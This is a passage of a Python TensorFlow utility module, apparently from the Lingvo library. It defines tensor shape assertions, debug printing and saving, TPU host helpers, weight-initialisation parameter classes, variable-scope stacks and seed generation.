tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
tensors += [tf.constant('{}='.format(caller_var)), tensor]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}='.format(name.strip())), val]
name = tensor.name if not tf.executing_eagerly() else '[eager]'
info = '{}{} {}'.format(header, caller_var, name)
return tf.identity(
tf.Print(tensor, tensors, info, summarize=summarize),
re.sub(':.*$', '', name))
return tensor
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.io.gfile.GFile(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
'Rank of tensor %d did not exceed the expected value %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies(
[tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor. Elements of expected_shape can
be -1 which indicate that any size is valid for that dimension.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor` with control dependencies that will raise a runtime
error if dynamic shape checks fail.
Raises:
ValueError: A value error if the assertion fails at static shape checks.
"""
if not py_utils_flags.enable_asserts():
return tensor
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
tensor_shape = GetShape(tensor)
if ndims is not None:
tensor_shape = tensor_shape[:ndims]
# TODO(jngiam): Attempt to switch back to tf.Assert after it has better
# support on GPUs.
assert_op = ops.assert_shape_match(tensor_shape, expected_shape, msg=msg)
# If expected_shape is a Tensor, then we are unable to perform static checks.
# In this case, we can do a dynamic check and return.
if isinstance(expected_shape, tf.Tensor):
return with_dependencies([assert_op], tensor)
# Infer ranks from the inputs.
expected_rank = len(expected_shape)
if isinstance(tensor_shape, tf.Tensor):
tensor_rank = tensor.shape.ndims
else:
tensor_rank = len(tensor_shape)
# If ndims is None, then either one of the ranks should not be None, or they
# should both match. If both ranks are None, then they are both tensors and
# should be caught by the earlier short-circuit.
if ndims is None:
if (tensor_rank is not None) and (expected_rank != tensor_rank):
raise ValueError('Tensor does not match rank of expected shape.\n'
'Tensor shape: {} Expected shape: {}'.format(
tensor_shape, expected_shape))
# Both tensors can be assumed to be of same rank.
ndims = expected_rank
else:
if (tensor_rank is not None) and (tensor_rank < ndims):
raise ValueError('Tensor has fewer dimensions than ndims.\n'
'Tensor shape: {} ndims: {}'.format(tensor_shape, ndims))
if expected_rank != ndims:
raise ValueError(
'Expected shape must have number of dimensions equal to ndims.\n'
'Expected shape: {} ndims: {}'.format(expected_shape, ndims))
# Ensure that both tensor_shape and expected_shape are both lists.
tensor_shape = tensor_shape[:ndims]
if isinstance(tensor_shape, tf.Tensor):
tensor_shape = tf.unstack(tensor_shape, num=ndims)
# Map tf.Dimension values to their held values.
tensor_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in tensor_shape
]
expected_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in expected_shape
]
all_static_checks = True
for idx, (dim, expected_dim) in enumerate(zip(tensor_shape, expected_shape)):
if isinstance(expected_dim, tf.Tensor):
all_static_checks = False
elif expected_dim == -1:
continue
elif isinstance(dim, tf.Tensor):
all_static_checks = False
elif dim != expected_dim:
raise ValueError('Tensor does not match expected shape on dimension {}.\n'
'Tensor shape: {} Expected shape: {}'.format(
idx, tensor_shape, expected_shape))
if all_static_checks:
return tf.convert_to_tensor(tensor)
else:
return with_dependencies([assert_op], tensor)
def HasSameShape(x, ref):
return HasShape(x, GetShape(ref))
def GetSize(tensor):
shape = GetShape(tensor)
if (isinstance(shape, tf.Tensor) or
any([isinstance(x, tf.Tensor) for x in shape])):
return tf.size(tensor)
return np.prod(shape)
def CausalSelfAttenPadding(seqlen, dtype):
"""Wraps tf.linalg.band_part() for tflite compatibility."""
if FLAGS.tflite_compatible:
# [N, 1]
rows = tf.expand_dims(tf.range(seqlen), -1)
# [1, N]
cols = tf.expand_dims(tf.range(seqlen), 0)
row_cols = rows - cols
return tf.where(row_cols < 0, tf.ones([seqlen, seqlen], dtype),
tf.zeros([seqlen, seqlen], tf.float32))
else:
return 1.0 - tf.linalg.band_part(
tf.ones([seqlen, seqlen], dtype=dtype), -1, 0)
def outside_all_rewrites(): # pylint: disable=invalid-name
return tf.control_dependencies(None)
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
# Maps a TPU job name ('/job:xxx') to the job's DeviceAssignment object.
# When there is only a single TPU job, the key could be None.
_tpu_device_assignment_dict = dict()
def SetTpuDeviceAssignment(tpu_device_assignment, job=None):
if job in _tpu_device_assignment_dict:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment_dict[job] = tpu_device_assignment
# This function should called in unittest only.
def ClearTpuDevice():
global _tpu_device_assignment_dict
_tpu_device_assignment_dict = dict()
def GetTpuDeviceAssignment(job=None):
return _tpu_device_assignment_dict[job]
# Whether it's running in eager mode. This is different than
# tf.executing_eagerly(), which will return False inside a tf.function.
_IS_EAGER_MODE = False
def SetIsEagerMode():
global _IS_EAGER_MODE
assert tf.executing_eagerly(), 'It must be in eager mode when setting this.'
_IS_EAGER_MODE = True
def IsEagerMode():
return _IS_EAGER_MODE
# The tf.train.ExponentialMovingAverage singleton used by all subtasks in
# multi-task training with ExecutorTpu.
_EXECUTOR_EMA = None
def SetExponentialMovingAverage(ema):
global _EXECUTOR_EMA
assert ema
assert not _EXECUTOR_EMA, 'EMA was set before.'
_EXECUTOR_EMA = ema
def ExponentialMovingAverage():
return _EXECUTOR_EMA
def SessionConfig(soft_placement=True,
inline=True,
cluster_def=None,
disable_meta_optimizer=False):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
disable_meta_optimizer: Turns off grappler/metagraph optimizer.
Returns:
A TF session config proto.
"""
session_config = tf.config_pb2.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
session_config.share_cluster_devices_in_session = True
if disable_meta_optimizer:
# Useful if start-up time is critical.
session_config.graph_options.rewrite_options.disable_meta_optimizer = True
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def ConvertNoneGradientToZeros(xs, dxs):
"""Sanitize dxs so that None becomes zeros appropriately.
Args:
xs: A list of tensors.
dxs: A list of tensors. dxs[i] corresponds to xs[i]'s gradient.
Returns:
A `.NestedMap` same as dxs with None replaced by a zero tensor.
"""
fn = lambda x, dx: tf.zeros_like(x) if dx is None else dx
return Transform(fn, xs, dxs)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
class _Unique:
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper:
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler:
"""A reservoir sampler.
This class implements reservoir sampling: Given a limit of `num_samples` total
samples, this class maintains a uniform probability (1 / `num_samples`) of
keeping any item dynamically added to the sampler.
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
class RNNCellStateInit:
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
shape: A array of ints/symbols for specifying the shape of the state.
init: Hyperparameters as returned by one of the static implemetaitons in
RNNCellStateInit.
dtype: The dype of the states. Defaults to tf.float32.
name: A name for the operation. If --stateless_vars_init is set, this name
is used to generate a seed on a per-variable basis. Otherwise, this name
is optional.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
if use_stateless_vars_init():
if name is None:
raise ValueError('InitRNNCellState() requires a `name` argument when '
'--stateless_vars_init is enabled.')
seed = _GenerateStatelessRngSeed(name, init.seed)
init_state = stateless_random_ops.stateless_random_normal(
shape=shape, dtype=dtype, name=name, seed=seed)
else:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit:
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
"""Parameters of this class."""
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random.uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random.uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Category(scale=2, seed=None):
"""tf.floor(scale * tf.random.uniform(0., 1.0))."""
return WeightInit._Params('category', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def GaussianSqrtFanAvg(scale=1.0, seed=None):
"""tf.random.normal(0, sqrt(2.0 / (in + out)))."""
return WeightInit._Params('gaussian_sqrt_fanavg', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def UniformUnitScalingFanAvg(scale=1.0, seed=None):
"""Same as tf.variance_scaling_initializer() ...
Samples are drawn from a uniform distribution within [-limit, limit], with
limit = sqrt(3 * scale / n)
where
n = max(1., (fan_in + fan_out) / 2).
See tf.keras.initializers.VarianceScaling for details.
Args:
scale: A Python float.
seed: A Python int or None.
Returns:
A WeightInit param.
"""
return WeightInit._Params('uniform_unit_scaling_fan_avg', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
# TODO(rpang, jonathanasdf): explore adding _is_default to hyperparams.Param.
def IsDefaultParamInit(p):
return (p.method == 'xavier' and
abs(p.scale - _DEFAULT_XAVIER_INIT) < 1e-7 and p.seed is None)
def WeightParams(shape,
init=None,
dtype=None,
collections=None,
device_mesh=None,
tensor_split_dims_mapping=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
if device_mesh is not None:
assert tensor_split_dims_mapping is not None
assert len(tensor_split_dims_mapping) == len(shape)
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
p.Define(
'device_mesh', device_mesh,
'A numpy.ndarray describing the topology of a device mesh to partition'
' this variable onto. Each element in the np.ndarray is the ID of a'
' device in the topology. device_mesh and tensor_split_dims_mapping below'
' together specifies how this weight tensor should be sharded across'
' different tpu cores. If None, this variable is not sharded.'
' Here are examples: np.array([0, 1, 2, 3, 4, 5, 6, 7]) which is a 1d'
' mesh with 8 devices, np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) which is'
' 2d matrix of 8 devices.')
p.Define(
'tensor_split_dims_mapping', tensor_split_dims_mapping,
'A list of integers that map each tensor axis to the device mesh axis'
' along which it is sharded. Its length is the tensor rank, and'
' split_dims_mapping[i] is device mesh axis for tensor dimension i. Use'
' -1 for tensor dimensions that are not sharded. If the list is set to'
' None and a device_mesh is specified, the sharding will be treated as'
' replicated. Here is a concrete examples: '
' device_mesh=np.array([[0, 1, 2, 3] [4, 5, 6, 7]]), of shape [2, 4]'
' shape=[x, y, z], so this is a 3d variable.'
' tensor_split_dims_mapping=[-1, -1, 1], in this case, the third dim'
' of the variable is split along the second dim of the mesh. Each '
' split of the variable is of the shape [x, y, z/4].')
return p
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
class _CollectionGetter:
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
if key.startswith('_'):
key = key[1:]
return key.replace('[', '_').replace(']', '')
# Maintain a session for unit tests (initialized in test_utils.py).
_SESSION_SCOPE = ThreadLocalStack()
@contextlib.contextmanager
def UnitTestSessionScope(sess):
_SESSION_SCOPE.stack.append(sess)
try:
yield
finally:
_SESSION_SCOPE.stack.pop()
def GetUnitTestSession():
"""Get the current variable reuse setting."""
return _SESSION_SCOPE.stack[-1] if _SESSION_SCOPE.stack else None
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With GetOpportunisticVariableReuse() == True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE = ThreadLocalStack()
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
_OPPORTUNISTIC_VARIABLE_REUSE.stack.append(enable_opportunistic_reuse)
try:
yield
finally:
_OPPORTUNISTIC_VARIABLE_REUSE.stack.pop()
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
return (_OPPORTUNISTIC_VARIABLE_REUSE.stack[-1]
if _OPPORTUNISTIC_VARIABLE_REUSE.stack else False)
_VARIABLE_RENAME_RULES = ThreadLocalStack()
# Global variable to track task calling scope.
# Currently only used for TPU Embedding purposes as a TPUEmbeddingLayer
# may be shared across tasks and the calling task needs to be known
# for tracking embedding activations for backprop.
_TASK_CALL_SCOPE = ThreadLocalStack()
def TaskCallScopeName(task):
"""Get a unique string identifying a task."""
return f'{task.params.name}_{id(task)}'
@contextlib.contextmanager
def TaskCallScope(task):
_TASK_CALL_SCOPE.stack.append(TaskCallScopeName(task))
try:
yield
finally:
_TASK_CALL_SCOPE.stack.pop()
def GetTaskCallScope():
"""Get the current task call scope."""
return _TASK_CALL_SCOPE.stack[-1] if _TASK_CALL_SCOPE.stack else None
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
_VARIABLE_RENAME_RULES.stack.append(renames)
try:
yield
finally:
_VARIABLE_RENAME_RULES.stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _VARIABLE_RENAME_RULES.stack:
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
_LIST_REGEX_DTYPE = ThreadLocalStack()
@contextlib.contextmanager
def VariableListDtypeRegexScope(list_regex_dtypes):
"""Append the list of (regex, dtype) to override the dtype.
Args:
list_regex_dtypes: pairs of (regexp, dtype). If the regexp matches, the data
type of the variable will be changed by the corresponding dtype.
Yields:
scope in which the list of (regex, dtype) is applied.
"""
_LIST_REGEX_DTYPE.stack.append(list_regex_dtypes)
try:
yield
finally:
_LIST_REGEX_DTYPE.stack.pop()
def FindDataType(var_name):
"""Find the data type for var_name.
Args:
var_name: A string, name of the variable.
Returns:
The dtype of the first matched regex with var_name, or None if no matching
found.
"""
for regex_dtypes in _LIST_REGEX_DTYPE.stack:
for regex, data_type in regex_dtypes:
if re.match(regex, var_name):
return data_type
return None
def GenerateSeedFromName(name):
"""Generate a random seed from a name string.
Args:
name: A string.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
def MaybeGenerateSeedFromScope():
"""Generate a random seed from the current name of the scope.
If running in eager mode, this returns 0.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if not tf.executing_eagerly():
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
return 0
def GenerateSeedFromId(obj_id):
"""Generate a random seed from the id of an object.
If deterministic execution (i.e. unit test), generate the seed from a fixed
unique name instead.
Args:
obj_id: id(object).
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
with tf.name_scope(''):
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
md5 = hashlib.md5()
md5.update(np.int64(obj_id))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = ThreadLocalStack()
def GetVarLeadingDimsAsCombinedLayers(var):
"""Gets the number of leading dimensions of `var` marked as combined layers.
Such dimensions represent variables from different layers stacked together,
e.g., in RepeatLayer, and optimizers (which have shape-dependant behaviors)
can adjust its behavior based on this information to match the behavior for
separate layer variables.
Args:
var: A variable.
Returns:
An integer representing the number of leading dimensions.
"""
try:
return var.op.get_attr('_num_leading_dims_for_combined_layers')
except ValueError:
return 0
except AttributeError:
# AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
return 0
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
This new dimension will be marked as combined-layers. See also comments for
GetVarLeadingDimsAsCombinedLayers().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.stack.append(shape_prefix)
try:
yield
finally:
_VARIABLE_SHAPE_PREFIXES.stack.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES.stack
def GetVariableNumLeadingDimsForCombinedLayersContext():
"""Return the number of leading combined-layers dims for CreateVariable()."""
return len(_VARIABLE_SHAPE_PREFIXES.stack)
def GetFanInFanOut(shape, prefix_dims_to_skip):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < prefix_dims_to_skip:
raise ValueError(f'Variable shape is {shape} but prefix_dims_to_skip is '
f'{prefix_dims_to_skip}, larger than the shape rank.')
adjusted_shape = shape[prefix_dims_to_skip:]
if len(adjusted_shape) < 1:
return 1, 1
elif len(adjusted_shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return adjusted_shape[0], adjusted_shape[0]
else:
receptive_field_size = 1
for s in adjusted_shape[:-2]:
receptive_field_size *= s
fan_in = adjusted_shape[-2] * receptive_field_size
fan_out = adjusted_shape[-1] * receptive_field_size
return fan_in, fan_out
_VARIABLE_CREATOR_STACK = ThreadLocalStack().stack
def _DefaultVariableCreator(**kwargs):
kwargs.pop('var_name', None)
kwargs.pop('var_params', None)
return tf.get_variable(**kwargs)
def _GetVariableCreator():
fn = _DefaultVariableCreator
for wrapper in reversed(_VARIABLE_CREATOR_STACK):
fn = functools.partial(wrapper, fn)
return fn
@contextlib.contextmanager
def VariableCreatorScope(variable_creator):
"""Yields a context around a variable_creator, used by `CreateVariable()`.
The function must have the following signature::
def variable_creator(next_creator, **kwargs)
The function may delegate variable creation to the next variable creator, or
return its own tf.Variable.
This differs from tf.variable_creator_scope in that tf.variable_creator_scope
